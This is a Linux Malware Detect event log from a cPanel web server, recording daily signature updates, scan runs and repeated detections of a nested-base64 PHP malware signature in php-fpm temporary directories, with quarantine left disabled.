Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cf63d0e89.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616e6b09830.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616cde25005.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ec295d03e.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e0d9dcfa.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea21f33ff.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f03ae4147.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614d9280cbd.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961ae85f00dd.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f0171c58b.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6962113744aab.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69621148233f5.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618dd75e91d.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614c20b555e.php
Jan 10 2026 04:03:21 web1 maldet(1529358): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6680, malware hits 148, cleaned hits 0, time 95s
Jan 10 2026 04:03:21 web1 maldet(1529358): {scan} scan report saved, to view run: maldet --report 260110-0401.1529358
Jan 10 2026 04:03:21 web1 maldet(1529358): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260110-0401.1529358
Jan 10 2026 13:48:37 web1 maldet(1155): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 11 2026 04:39:18 web1 maldet(287994): {update} checking for available updates...
Jan 11 2026 04:39:18 web1 maldet(287994): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 11 2026 04:39:18 web1 maldet(287994): {update} hashing install files and checking against server...
Jan 11 2026 04:39:19 web1 maldet(287994): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 11 2026 04:39:19 web1 maldet(287994): {update} latest version already installed.
Jan 11 2026 04:39:19 web1 maldet(288103): {sigup} performing signature update check...
Jan 11 2026 04:39:19 web1 maldet(288103): {sigup} local signature set is version 202601101643813
Jan 11 2026 04:39:19 web1 maldet(288103): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 11 2026 04:39:19 web1 maldet(288103): {sigup} latest signature set already installed
Jan 11 2026 04:39:19 web1 maldet(288191): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 11 2026 04:39:19 web1 maldet(288191): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 11 2026 04:39:19 web1 maldet(288191): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 11 2026 04:39:19 web1 maldet(288191): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 11 2026 04:39:19 web1 maldet(288191): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 11 2026 04:39:50 web1 maldet(288191): {scan} file list completed in 31s, found 1511 files...
Jan 11 2026 04:39:50 web1 maldet(288191): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 11 2026 04:39:50 web1 maldet(288191): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1511 files) in progress...
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6962529fc40ef.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252e0afc52.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252d063478.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696232228a96b.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696231ef1abc8.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696231d3e1793.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252b094308.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69623207b4860.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6962323b4aade.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69623254b3429.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252f09e518.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252c0bda5b.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6962529fc40ef.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252e0afc52.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252d063478.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696232228a96b.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696231ef1abc8.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696231d3e1793.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252b094308.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69623207b4860.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6962323b4aade.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69623254b3429.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252f09e518.php
Jan 11 2026 04:40:22 web1 maldet(288191): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696252c0bda5b.php
Jan 11 2026 04:40:23 web1 maldet(288191): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1511, malware hits 24, cleaned hits 0, time 63s
Jan 11 2026 04:40:23 web1 maldet(288191): {scan} scan report saved, to view run: maldet --report 260111-0439.288191
Jan 11 2026 04:40:23 web1 maldet(288191): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260111-0439.288191
Jan 11 2026 15:26:41 web1 maldet(1171): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 12 2026 04:06:23 web1 maldet(268228): {update} checking for available updates...
Jan 12 2026 04:06:23 web1 maldet(268228): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 12 2026 04:06:23 web1 maldet(268228): {update} hashing install files and checking against server...
Jan 12 2026 04:06:23 web1 maldet(268228): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 12 2026 04:06:23 web1 maldet(268228): {update} latest version already installed.
Jan 12 2026 04:06:23 web1 maldet(268339): {sigup} performing signature update check...
Jan 12 2026 04:06:23 web1 maldet(268339): {sigup} local signature set is version 202601101643813
Jan 12 2026 04:06:24 web1 maldet(268339): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 12 2026 04:06:24 web1 maldet(268339): {sigup} latest signature set already installed
Jan 12 2026 04:06:24 web1 maldet(268429): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 12 2026 04:06:24 web1 maldet(268429): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 12 2026 04:06:24 web1 maldet(268429): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 12 2026 04:06:24 web1 maldet(268429): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 12 2026 04:06:24 web1 maldet(268429): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 12 2026 04:06:53 web1 maldet(268429): {scan} file list completed in 29s, found 851 files...
Jan 12 2026 04:06:53 web1 maldet(268429): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 12 2026 04:06:53 web1 maldet(268429): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (851 files) in progress...
Jan 12 2026 04:07:20 web1 maldet(268429): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 851, malware hits 0, cleaned hits 0, time 56s
Jan 12 2026 04:07:20 web1 maldet(268429): {scan} scan report saved, to view run: maldet --report 260112-0406.268429
Jan 12 2026 08:42:34 web1 maldet(1151): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 13 2026 03:49:30 web1 maldet(363128): {update} checking for available updates...
Jan 13 2026 03:49:30 web1 maldet(363128): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 13 2026 03:49:30 web1 maldet(363128): {update} hashing install files and checking against server...
Jan 13 2026 03:49:30 web1 maldet(363128): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 13 2026 03:49:30 web1 maldet(363128): {update} latest version already installed.
Jan 13 2026 03:49:30 web1 maldet(363238): {sigup} performing signature update check...
Jan 13 2026 03:49:30 web1 maldet(363238): {sigup} local signature set is version 202601101643813
Jan 13 2026 03:49:30 web1 maldet(363238): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 13 2026 03:49:30 web1 maldet(363238): {sigup} latest signature set already installed
Jan 13 2026 03:49:30 web1 maldet(363326): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 13 2026 03:49:30 web1 maldet(363326): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 13 2026 03:49:30 web1 maldet(363326): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 13 2026 03:49:30 web1 maldet(363326): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 13 2026 03:49:30 web1 maldet(363326): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 13 2026 03:50:01 web1 maldet(363326): {scan} file list completed in 31s, found 4365 files...
Jan 13 2026 03:50:01 web1 maldet(363326): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 13 2026 03:50:01 web1 maldet(363326): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (4365 files) in progress...
Jan 13 2026 03:51:02 web1 maldet(363326): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 4365, malware hits 0, cleaned hits 0, time 92s
Jan 13 2026 03:51:02 web1 maldet(363326): {scan} scan report saved, to view run: maldet --report 260113-0349.363326
Jan 13 2026 22:51:17 web1 maldet(1145): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 14 2026 03:19:29 web1 maldet(79906): {update} checking for available updates...
Jan 14 2026 03:19:29 web1 maldet(79906): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 14 2026 03:19:29 web1 maldet(79906): {update} hashing install files and checking against server...
Jan 14 2026 03:19:29 web1 maldet(79906): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 14 2026 03:19:29 web1 maldet(79906): {update} latest version already installed.
Jan 14 2026 03:19:29 web1 maldet(80015): {sigup} performing signature update check...
Jan 14 2026 03:19:29 web1 maldet(80015): {sigup} local signature set is version 202601101643813
Jan 14 2026 03:19:29 web1 maldet(80015): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 14 2026 03:19:29 web1 maldet(80015): {sigup} latest signature set already installed
Jan 14 2026 03:19:29 web1 maldet(80104): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 14 2026 03:19:29 web1 maldet(80104): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 14 2026 03:19:29 web1 maldet(80104): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 14 2026 03:19:29 web1 maldet(80104): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 14 2026 03:19:29 web1 maldet(80104): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 14 2026 03:20:01 web1 maldet(80104): {scan} file list completed in 32s, found 4419 files...
Jan 14 2026 03:20:02 web1 maldet(80104): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 14 2026 03:20:02 web1 maldet(80104): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (4419 files) in progress...
Jan 14 2026 03:20:59 web1 maldet(80104): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 4419, malware hits 0, cleaned hits 0, time 90s
Jan 14 2026 03:20:59 web1 maldet(80104): {scan} scan report saved, to view run: maldet --report 260114-0319.80104
Jan 15 2026 03:39:29 web1 maldet(504875): {update} checking for available updates...
Jan 15 2026 03:39:29 web1 maldet(504875): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 15 2026 03:39:29 web1 maldet(504875): {update} hashing install files and checking against server...
Jan 15 2026 03:39:29 web1 maldet(504875): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 15 2026 03:39:29 web1 maldet(504875): {update} latest version already installed.
Jan 15 2026 03:39:29 web1 maldet(504984): {sigup} performing signature update check...
Jan 15 2026 03:39:29 web1 maldet(504984): {sigup} local signature set is version 202601101643813
Jan 15 2026 03:39:29 web1 maldet(504984): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 15 2026 03:39:30 web1 maldet(504984): {sigup} latest signature set already installed
Jan 15 2026 03:39:30 web1 maldet(505072): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 15 2026 03:39:30 web1 maldet(505072): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 15 2026 03:39:30 web1 maldet(505072): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 15 2026 03:39:30 web1 maldet(505072): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 15 2026 03:39:30 web1 maldet(505072): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 15 2026 03:40:01 web1 maldet(505072): {scan} file list completed in 31s, found 7188 files...
Jan 15 2026 03:40:01 web1 maldet(505072): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 15 2026 03:40:01 web1 maldet(505072): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (7188 files) in progress...
Jan 15 2026 03:41:30 web1 maldet(505072): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 7188, malware hits 0, cleaned hits 0, time 120s
Jan 15 2026 03:41:30 web1 maldet(505072): {scan} scan report saved, to view run: maldet --report 260115-0339.505072
Jan 15 2026 18:47:05 web1 maldet(1131): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 16 2026 03:54:32 web1 maldet(140273): {update} checking for available updates...
Jan 16 2026 03:54:32 web1 maldet(140273): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 16 2026 03:54:32 web1 maldet(140273): {update} hashing install files and checking against server...
Jan 16 2026 03:54:32 web1 maldet(140273): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 16 2026 03:54:32 web1 maldet(140273): {update} latest version already installed.
Jan 16 2026 03:54:32 web1 maldet(140384): {sigup} performing signature update check...
Jan 16 2026 03:54:32 web1 maldet(140384): {sigup} local signature set is version 202601101643813
Jan 16 2026 03:54:32 web1 maldet(140384): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 16 2026 03:54:32 web1 maldet(140384): {sigup} new signature set 20260116700884 available
Jan 16 2026 03:54:32 web1 maldet(140384): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} verified md5sum of maldet-clean.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} unpacked and installed maldet-clean.tgz
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} signature set update completed
Jan 16 2026 03:54:33 web1 maldet(140384): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 16 2026 03:54:34 web1 maldet(140591): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 16 2026 03:54:34 web1 maldet(140591): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 16 2026 03:54:34 web1 maldet(140591): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 16 2026 03:54:34 web1 maldet(140591): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 16 2026 03:54:34 web1 maldet(140591): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 16 2026 03:55:39 web1 maldet(140591): {scan} file list completed in 65s, found 3235 files...
Jan 16 2026 03:55:39 web1 maldet(140591): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 16 2026 03:55:39 web1 maldet(140591): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (3235 files) in progress...
Jan 16 2026 03:56:38 web1 maldet(140591): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 3235, malware hits 0, cleaned hits 0, time 124s
Jan 16 2026 03:56:38 web1 maldet(140591): {scan} scan report saved, to view run: maldet --report 260116-0354.140591
Jan 17 2026 04:47:30 web1 maldet(504353): {update} checking for available updates...
Jan 17 2026 04:47:30 web1 maldet(504353): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 17 2026 04:47:30 web1 maldet(504353): {update} hashing install files and checking against server...
Jan 17 2026 04:47:30 web1 maldet(504353): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 17 2026 04:47:30 web1 maldet(504353): {update} latest version already installed.
Jan 17 2026 04:47:30 web1 maldet(504463): {sigup} performing signature update check...
Jan 17 2026 04:47:31 web1 maldet(504463): {sigup} local signature set is version 20260116700884
Jan 17 2026 04:47:31 web1 maldet(504463): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 17 2026 04:47:31 web1 maldet(504463): {sigup} latest signature set already installed
Jan 17 2026 04:47:31 web1 maldet(504551): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 17 2026 04:47:31 web1 maldet(504551): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 17 2026 04:47:31 web1 maldet(504551): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 17 2026 04:47:31 web1 maldet(504551): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 17 2026 04:47:31 web1 maldet(504551): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 17 2026 04:48:04 web1 maldet(504551): {scan} file list completed in 33s, found 28564 files...
Jan 17 2026 04:48:04 web1 maldet(504551): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 17 2026 04:48:04 web1 maldet(504551): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (28564 files) in progress...
Jan 17 2026 04:53:38 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9c4972915.php
